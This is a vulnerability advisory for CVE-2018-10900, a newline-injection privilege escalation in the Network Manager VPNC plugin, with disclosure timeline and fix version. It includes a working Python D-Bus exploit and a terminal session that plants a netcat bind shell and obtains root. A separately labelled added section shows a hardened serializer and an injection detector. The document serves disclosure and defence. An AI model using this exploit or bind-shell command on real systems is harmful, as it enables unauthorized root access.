Network Manager VPNC 1.2.4 Privilege Escalation
Source: https://pulsesecurity.co.nz  Author: Andzakovic  Published: 2018-07-25
Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Date Released: 21/07/2018  
CVE: CVE-2018-10900
Author: Denis Andzakovic  
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc  
Affected Software: Network Manager VPNC <= 1.2.4

--[ Description
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A newline character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root.

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager into setting the Password helper option to an attacker-controlled executable file.

The following Python script creates a VPNC connection which will execute the /tmp/test file when connected. The newline character is injected into the Xauth username parameter.

import dbus

# Connection settings to be handed to NetworkManager over D-Bus.
con = {
    'vpn':{
        'service-type':'org.freedesktop.NetworkManager.vpnc',
        'data':{
            'IKE DH Group':'dh2',
            'IPSec ID':'testgroup',
            'IPSec gateway':'gateway',
            'IPSec secret-flags':'4',
            'Local Port':'0',
            'NAT Traversal Mode': 'natt',
            'Perfect Forward Secrecy': 'server',
            'Vendor': 'cisco',
            'Xauth password-flags': '4',
            # The embedded newline ends the username line and starts a
            # new "Password helper" line in the config written to vpnc.
            'Xauth username': "username\nPassword helper /tmp/test",
            'ipsec-secret-type': 'unused',
            'xauth-password-type': 'unused'
            }
    },
    'connection':{
        'type':'vpn',
        'id':'vpnc_test',
    },
    'ipv4':{'method':'auto'},
    'ipv6':{'method':'auto'}
}

# Add the connection through the NetworkManager Settings interface.
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)

The above results in the following configuration being passed to the vpnc process when the connection is initialized:  

Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950  --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt
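The defect is a classic line-injection flaw in a line-oriented config format. As an added illustration (not part of this advisory and not the NetworkManager-vpnc project's code), the snippet below contrasts the vulnerable "write every value verbatim" pattern with a hardened serializer that refuses values carrying line breaks or NUL bytes, and a check that flags any resulting line that sets an executable option. The sample dictionaries and all function names are constructed for this example.

```python
import re

# Constructed sample: the vpnc "data" block from the script above, with a
# newline injected into the Xauth username value.
INJECTED_DATA = {
    'IKE DH Group': 'dh2',
    'IPSec ID': 'testgroup',
    'IPSec gateway': 'gateway',
    'Xauth username': "username\nPassword helper /tmp/test",
    'Vendor': 'cisco',
}

# Constructed sample: the same data with a benign username.
CLEAN_DATA = dict(INJECTED_DATA, **{'Xauth username': 'username'})

# vpnc options that name a program to execute; a config built from
# connection data must never be able to produce a line starting with one.
EXEC_OPTIONS = ('Password helper', 'Script')

CONTROL_CHARS = re.compile(r'[\r\n\x00]')

def naive_serialize(data):
    """Vulnerable pattern: each value is written verbatim as 'Key value\\n',
    so a '\\n' inside a value terminates the line and starts a new option."""
    return ''.join(f'{key} {value}\n' for key, value in data.items())

def tainted_keys(data):
    """Keys whose name or value carries a line break or NUL byte."""
    return [k for k, v in data.items() if CONTROL_CHARS.search(k + v)]

def hardened_serialize(data):
    """Refuse to serialize connection data that could smuggle an extra line."""
    bad = tainted_keys(data)
    if bad:
        raise ValueError(f'control characters in vpnc option(s): {bad}')
    return naive_serialize(data)

def smuggled_exec_lines(text):
    """Lines of a serialized config that set an executable option. On a
    config derived only from connection data, this list should be empty."""
    prefixes = tuple(opt + ' ' for opt in EXEC_OPTIONS)
    return [line for line in text.splitlines() if line.startswith(prefixes)]
```

Running `smuggled_exec_lines` over the naive output of `INJECTED_DATA` reproduces the "Password helper /tmp/test" line shown above, while `hardened_serialize` rejects the same input before it ever reaches vpnc.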

The following terminal session shows the complete privilege escalation attack.

doi@ubuntu:~$ cat << EOF > /tmp/test
> #!/bin/bash
> mkfifo pipe
> nc -k -l -p 8080 < pipe | /bin/bash > pipe
> EOF
doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAME                UUID                                  TYPE      DEVICE
Wired connection 1  a8b178fd-8cbc-3e15-aa9e-d52982215d98  ethernet  ens3
vpnc_test           233101cb-f786-44ed-9e4f-662f1a519429  vpn       ens3
doi@ubuntu:~$ nmcli connection up vpnc_test

^Z
[1]+  Stopped                 nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

--[ Timeline

11/07/2018 - Advisory sent to security@gnome.org  
13/07/2018 - Acknowledgement from Gnome security  
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day  
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released

--[ About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz